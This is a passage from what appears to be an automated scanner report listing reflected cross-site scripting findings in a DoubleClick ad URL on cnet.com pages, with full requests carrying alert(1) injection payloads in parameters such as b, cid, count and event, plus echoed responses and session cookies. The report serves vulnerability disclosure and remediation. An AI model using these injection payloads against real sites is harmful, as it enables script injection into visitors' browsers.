The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 176ca"-alert(1)-"53528f4652 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOY
...[SNIP]...

3.167. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a176b"-alert(1)-"36a5848f12d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event
...[SNIP]...

3.168. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd5b"-alert(1)-"1ee697af197 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN048");
var fscUrl = url;
var fs
...[SNIP]...

3.169. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1593"-alert(1)-"9914ac032e4 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
...[SNIP]...

3.170. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddae"-alert(1)-"32d4a8875d7 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://
...[SNIP]...

3.171. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9cf4"-alert(1)-"67ea7960a5 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
p://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q10000001403000
...[SNIP]...

3.172. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd56a"-alert(1)-"5892d568ade was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568ade HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7294
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:20:36 GMT
Expires: Wed, 27 Apr 2011 23:20:36 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568adehttp://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcall
...[SNIP]...

3.173. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1263e"-alert(1)-"fe5cbeb2d43 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=n
...[SNIP]...

3.174. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ab5"-alert(1)-"f00fa922e97 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
48%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwY
...[SNIP]...

3.175. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99b24"-alert(1)-"62791cafedf was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
